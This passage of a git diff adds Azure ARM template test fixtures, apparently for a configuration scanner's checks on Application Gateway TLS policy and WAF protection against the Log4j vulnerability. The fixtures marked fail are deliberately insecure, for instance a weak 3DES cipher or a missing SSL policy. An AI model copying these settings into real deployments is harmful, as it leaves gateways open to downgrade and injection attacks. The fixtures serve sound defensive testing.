+      "apiVersion": "2021-02-01",
+      "type": "Microsoft.Network/publicIPAddresses",
+      "name": "[variables('publicIPAddressName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "publicIPAllocationMethod": "Dynamic"
+      }
+    },
+    {
+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.Network/virtualNetworks",
+      "name": "defoult",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('addressPrefix')]"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "[variables('subnetName')]",
+            "properties": {
+              "addressPrefix": "[parameters('subnetPrefix')]"
+            }
+          }
+        ]
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "name": "with_protocolversion_and_cipher_fail2",
+      "type": "Microsoft.Network/applicationGateways",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]",
+        "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]"
+      ],
+      "properties": {
+        "sku": {
+          "name": "[parameters('skuName')]",
+          "tier": "Standard",
+          "capacity": "[parameters('capacity')]"
+        },
+        "sslCertificates": [
+          {
+            "name": "appGatewaySslCert",
+            "properties": {
+              "data": "[parameters('certData')]",
+              "password": "[parameters('certPassword')]"
+            }
+          }
+        ],
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGatewayFrontendIP",
+            "properties": {
+              "PublicIPAddress": {
+                "id": "[variables('publicIPRef')]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "appGatewayFrontendPort",
+            "properties": {
+              "Port": 443
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "appGatewayBackendPool",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddress1')]"
+                },
+                {
+                  "IpAddress": "[parameters('backendIpAddress2')]"
+                }
+              ]
+            }
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "appGatewayBackendHttpSettings",
+            "properties": {
+              "Port": 80,
+              "Protocol": "Http",
+              "CookieBasedAffinity": "Disabled"
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "appGatewayHttpListener",
+            "properties": {
+              "FrontendIPConfiguration": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]"
+              },
+              "FrontendPort": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]"
+              },
+              "Protocol": "Https",
+              "SslCertificate": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]"
+              }
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "Name": "rule1",
+            "properties": {
+              "RuleType": "Basic",
+              "httpListener": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]"
+              },
+              "backendAddressPool": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+              }
+            }
+          }
+        ],
+        "sslPolicy": {
+          "policyType": "Custom",
+          "minProtocolVersion": "TLSv1_2",
+          "cipherSuites": [
+             "TLS_AES_128_GCM_SHA256","TLS_AES_256_GCM_SHA384",
+             "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
+             "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
+             "TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA"
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json
new file mode 100644
index 00000000000..1e51ad85903
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_pass.json
@@ -0,0 +1,233 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "addressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Address prefix for the Virtual Network"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/28",
+      "metadata": {
+        "description": "Subnet prefix"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "allowedValues": [
+        "Standard_Small",
+        "Standard_Medium",
+        "Standard_Large"
+      ],
+      "defaultValue": "Standard_Medium",
+      "metadata": {
+        "description": "Sku Name"
+      }
+    },
+    "capacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Number of instances"
+      }
+    },
+    "backendIpAddress1": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 1"
+      }
+    },
+    "backendIpAddress2": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 2"
+      }
+    },
+    "certData": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Base-64 encoded form of the .pfx file"
+      }
+    },
+    "certPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for .pfx certificate"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "applicationGatewayName": "applicationGateway1",
+    "publicIPAddressName": "publicIp1",
+    "virtualNetworkName": "virtualNetwork",
+    "subnetName": "appGatewaySubnet",
+    "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+    "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]"
+  },
+  "resources": [
+    {
+      "apiVersion": "2021-02-01",
+      "type": "Microsoft.Network/publicIPAddresses",
+      "name": "[variables('publicIPAddressName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "publicIPAllocationMethod": "Dynamic"
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "type": "Microsoft.Network/virtualNetworks",
+      "name": "defoult",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('addressPrefix')]"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "[variables('subnetName')]",
+            "properties": {
+              "addressPrefix": "[parameters('subnetPrefix')]"
+            }
+          }
+        ]
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "name": "with_protocolversion_and_cipher_pass",
+      "type": "Microsoft.Network/applicationGateways",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]",
+        "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]"
+      ],
+      "properties": {
+        "sku": {
+          "name": "[parameters('skuName')]",
+          "tier": "Standard",
+          "capacity": "[parameters('capacity')]"
+        },
+        "sslCertificates": [
+          {
+            "name": "appGatewaySslCert",
+            "properties": {
+              "data": "[parameters('certData')]",
+              "password": "[parameters('certPassword')]"
+            }
+          }
+        ],
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGatewayFrontendIP",
+            "properties": {
+              "PublicIPAddress": {
+                "id": "[variables('publicIPRef')]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "appGatewayFrontendPort",
+            "properties": {
+              "Port": 443
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "appGatewayBackendPool",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddress1')]"
+                },
+                {
+                  "IpAddress": "[parameters('backendIpAddress2')]"
+                }
+              ]
+            }
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "appGatewayBackendHttpSettings",
+            "properties": {
+              "Port": 80,
+              "Protocol": "Http",
+              "CookieBasedAffinity": "Disabled"
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "appGatewayHttpListener",
+            "properties": {
+              "FrontendIPConfiguration": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]"
+              },
+              "FrontendPort": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]"
+              },
+              "Protocol": "Https",
+              "SslCertificate": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]"
+              }
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "Name": "rule1",
+            "properties": {
+              "RuleType": "Basic",
+              "httpListener": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]"
+              },
+              "backendAddressPool": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+              }
+            }
+          }
+        ],
+        "sslPolicy": {
+          "policyType": "Custom",
+          "minProtocolVersion": "TLSv1_2",
+          "cipherSuites": [
+            "TLS_AES_128_GCM_SHA256",
+            "TLS_AES_256_GCM_SHA384",
+            "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
+            "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
+          ]
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json
new file mode 100644
index 00000000000..a0bb9a2a128
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/without_sslPolicy_fail.json
@@ -0,0 +1,276 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "addressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Address prefix for the Virtual Network"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/28",
+      "metadata": {
+        "description": "Subnet prefix"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "allowedValues": [
+        "Standard_Small",
+        "Standard_Medium",
+        "Standard_Large"
+      ],
+      "defaultValue": "Standard_Medium",
+      "metadata": {
+        "description": "Sku Name"
+      }
+    },
+    "capacity": {
+      "type": "int",
+      "minValue": 1,
+      "maxValue": 10,
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Number of instances"
+      }
+    },
+    "backendIpAddressDefault": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address of Default Backend Server"
+      }
+    },
+    "backendIpAddressForPathRule1": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address of Backend Server for Path Rule 1 match"
+      }
+    },
+    "backendIpAddressForPathRule2": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address of Backend Server for Path Rule 2 match"
+      }
+    },
+    "pathMatch1": {
+      "type": "string",
+      "metadata": {
+        "description": "Path match string for Path Rule 1"
+      }
+    },
+    "pathMatch2": {
+      "type": "string",
+      "metadata": {
+        "description": "Path match string for Path Rule 2"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "applicationGatewayName": "applicationGateway1",
+    "publicIPAddressName": "publicIp1",
+    "virtualNetworkName": "virtualNetwork1",
+    "subnetName": "appGatewaySubnet",
+    "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+    "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]"
+  },
+  "resources": [
+    {
+      "apiVersion": "2020-08-01",
+      "type": "Microsoft.Network/publicIPAddresses",
+      "name": "[variables('publicIPAddressName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "publicIPAllocationMethod": "Dynamic"
+      }
+    },
+    {
+      "apiVersion": "2020-08-01",
+      "type": "Microsoft.Network/virtualNetworks",
+      "name": "[variables('virtualNetworkName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('addressPrefix')]"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "[variables('subnetName')]",
+            "properties": {
+              "addressPrefix": "[parameters('subnetPrefix')]"
+            }
+          }
+        ]
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "name": "without_sslPolicy_fail",
+      "type": "Microsoft.Network/applicationGateways",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworkName'))]",
+        "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPAddressName'))]"
+      ],
+      "properties": {
+        "sku": {
+          "name": "[parameters('skuName')]",
+          "tier": "Standard",
+          "capacity": "[parameters('capacity')]"
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGatewayFrontendPublicIP",
+            "properties": {
+              "PublicIPAddress": {
+                "id": "[variables('publicIPRef')]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "appGatewayFrontendPort80",
+            "properties": {
+              "Port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "appGatewayBackendPoolDefault",
+            "properties": {
+              "BackendAddresses":[
+                {
+                  "IpAddress": "[parameters('backendIpAddressDefault')]"
+                }
+              ]
+            }
+          },
+          {
+            "name": "appGatewayBackendPool1",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddressForPathRule1')]"
+                }
+              ]
+            }
+          },
+          {
+            "name": "appGatewayBackendPool2",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddressForPathRule2')]"
+                }
+              ]
+            }
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "appGatewayBackendHttpSettings",
+            "properties": {
+              "Port": 80,
+              "Protocol": "Http",
+              "CookieBasedAffinity": "Disabled"
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "appGatewayHttpListener",
+            "properties": {
+              "FrontendIPConfiguration": {
+                "Id":  "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendPublicIP')]"
+              },
+              "FrontendPort": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort80')]"
+              },
+              "Protocol": "Http"
+            }
+          }
+        ],
+        "urlPathMaps": [
+          {
+            "name": "urlPathMap1",
+            "properties": {
+              "defaultBackendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPoolDefault')]"
+              },
+              "defaultBackendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+              },
+              "pathRules": [
+                {
+                  "name": "pathRule1",
+                  "properties": {
+                    "paths": [
+                      "[parameters('pathMatch1')]"
+                    ],
+                    "backendAddressPool": {
+                      "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool1')]"
+                    },
+                    "backendHttpSettings": {
+                      "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+                    }
+                  }
+                },
+                {
+                  "name": "pathRule2",
+                  "properties": {
+                    "paths": [
+                      "[parameters('pathMatch2')]"
+                    ],
+                    "backendAddressPool": {
+                      "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool2')]"
+                    },
+                    "backendHttpSettings": {
+                      "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+                    }
+                  }
+                }
+              ]
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "Name": "rule1",
+            "properties": {
+              "RuleType": "PathBasedRouting",
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]"
+              },
+              "urlPathMap": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/urlPathMaps',variables('applicationGatewayName'), 'urlPathMap1')]"
+              }
+            }
+          }
+        ]
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/empty_disabled_rules_pass.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/empty_disabled_rules_pass.json
new file mode 100644
index 00000000000..3fdb0f7e8b7
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/empty_disabled_rules_pass.json
@@ -0,0 +1,254 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/applicationGateways",
+      "apiVersion": "2021-08-01",
+      "name": "[variables('applicationGateways_myAppGateway_name')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "sku": {
+          "name": "WAF_v2",
+          "tier": "WAF_v2",
+          "capacity": 2
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGwPublicFrontendIp",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "port_80",
+            "properties": {
+              "port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "myBackendPool",
+            "properties": {}
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "myHTTPSetting",
+            "properties": {
+              "port": 80,
+              "protocol": "Http",
+              "cookieBasedAffinity": "Disabled",
+              "pickHostNameFromBackendAddress": false,
+              "requestTimeout": 20
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "myListener",
+            "properties": {
+              "firewallPolicy": {
+                "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+              },
+              "frontendIPConfiguration": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]"
+              },
+              "frontendPort": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]"
+              },
+              "protocol": "Http",
+              "requireServerNameIndication": false
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "name": "myRoutingRule",
+            "properties": {
+              "ruleType": "Basic",
+              "priority": 10,
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGateways_myAppGateway_name'), 'myHTTPSetting')]"
+              }
+            }
+          }
+        ],
+        "enableHttp2": false,
+        "firewallPolicy": {
+          "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "publicIPAddress"
+      ]
+    },
+    {
+      "type": "Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies",
+      "apiVersion": "2021-08-01",
+      "name": "empty_disabled_rules_pass",
+      "location": "[parameters('location')]",
+      "properties": {
+        "customRules": [
+          {
+            "name": "CustRule01",
+            "priority": 100,
+            "ruleType": "MatchRule",
+            "action": "Block",
+            "matchConditions": [
+              {
+                "matchVariables": [
+                  {
+                    "variableName": "RemoteAddr"
+                  }
+                ],
+                "operator": "IPMatch",
+                "negationConditon": true,
+                "matchValues": [
+                  "10.10.10.0/24"
+                ]
+              }
+            ]
+          }
+        ],
+        "policySettings": {
+          "requestBodyCheck": true,
+          "maxRequestBodySizeInKb": 128,
+          "fileUploadLimitInMb": 100,
+          "state": "Enabled",
+          "mode": "Prevention"
+        },
+        "managedRules": {
+         "managedRuleSets": [
+            {
+              "ruleGroupOverrides": [
+            {
+              "ruleGroupName": "REQUEST-944-APPLICATION-ATTACK-JAVA"
+            }
+          ],
+              "ruleSetType": "OWASP",
+              "ruleSetVersion": "3.1"
+            }
+          ]
+        }
+      }
+    },
+    {
+      "copy": {
+        "name": "myNic",
+        "count": "[length(range(0, 2))]"
+      },
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2021-08-01",
+      "name": "[format('{0}{1}', variables('myNic_name'), add(range(0, 2)[copyIndex()], 1))]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "[format('{0}{1}', variables('ipconfig_name'), add(range(0, 2)[copyIndex()], 1))]",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}{1}', variables('publicIPAddress_name'), add(range(0, 2)[copyIndex()], 1)))]"
+              },
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myBackendSubnet')]"
+              },
+              "primary": true,
+              "privateIPAddressVersion": "IPv4",
+              "applicationGatewayBackendAddressPools": [
+                {
+                  "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGateways_myAppGateway_name'), 'myBackendPool')]"
+                }
+              ]
+            }
+          }
+        ],
+        "enableAcceleratedNetworking": false,
+        "enableIPForwarding": false,
+        "networkSecurityGroup": {
+          "id": "[resourceId('Microsoft.Network/networkSecurityGroups', format('{0}{1}', variables('nsg_name'), add(range(0, 2)[copyIndex()], 1)))]"
+        }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/applicationGateways', variables('applicationGateways_myAppGateway_name'))]",
+        "[resourceId('Microsoft.Network/virtualNetworks', variables('virtualNetworks_myVNet_name'))]",
+        "nsg",
+        "publicIPAddress"
+      ]
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_0_fail.json b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_0_fail.json
new file mode 100644
index 00000000000..8c9f335f1ea
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGatewayWAFACLCVE202144228/owasp_3_0_fail.json
@@ -0,0 +1,249 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.15.31.15270",
+      "templateHash": "7253194970749033988"
+    }
+  },
+  "parameters": {
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username for the backend servers"
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for the admin account on the backend servers"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    },
+    "vmSize": {
+      "type": "string",
+      "defaultValue": "Standard_B2ms",
+      "metadata": {
+        "description": "Size of the virtual machine."
+      }
+    }
+  },
+  "variables": {
+    "virtualMachines_myVM_name": "myVM",
+    "virtualNetworks_myVNet_name": "myVNet",
+    "myNic_name": "net-int",
+    "ipconfig_name": "ipconfig",
+    "publicIPAddress_name": "public_ip",
+    "nsg_name": "vm-nsg",
+    "applicationGateways_myAppGateway_name": "myAppGateway",
+    "vnet_prefix": "10.0.0.0/16",
+    "ag_subnet_prefix": "10.0.0.0/24",
+    "backend_subnet_prefix": "10.0.1.0/24",
+    "AppGW_AppFW_Pol_name": "WafPol01"
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.Network/applicationGateways",
+      "apiVersion": "2021-08-01",
+      "name": "[variables('applicationGateways_myAppGateway_name')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "sku": {
+          "name": "WAF_v2",
+          "tier": "WAF_v2",
+          "capacity": 2
+        },
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworks_myVNet_name'), 'myAGSubnet')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGwPublicFrontendIp",
+            "properties": {
+              "privateIPAllocationMethod": "Dynamic",
+              "publicIPAddress": {
+                "id": "[resourceId('Microsoft.Network/publicIPAddresses', format('{0}0', variables('publicIPAddress_name')))]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "port_80",
+            "properties": {
+              "port": 80
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "myBackendPool",
+            "properties": {}
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "myHTTPSetting",
+            "properties": {
+              "port": 80,
+              "protocol": "Http",
+              "cookieBasedAffinity": "Disabled",
+              "pickHostNameFromBackendAddress": false,
+              "requestTimeout": 20
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "myListener",
+            "properties": {
+              "firewallPolicy": {
+                "id": "[resourceId('Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies', variables('AppGW_AppFW_Pol_name'))]"
+              },
+              "frontendIPConfiguration": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGateways_myAppGateway_name'), 'appGwPublicFrontendIp')]"
+              },
+              "frontendPort": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGateways_myAppGateway_name'), 'port_80')]"
+              },
+              "protocol": "Http",
+              "requireServerNameIndication": false
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "name": "myRoutingRule",
+            "properties": {
+              "ruleType": "Basic",
+              "priority": 10,
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGateways_myAppGateway_name'), 'myListener')]"
+              },
+              "backendAddressPool": {
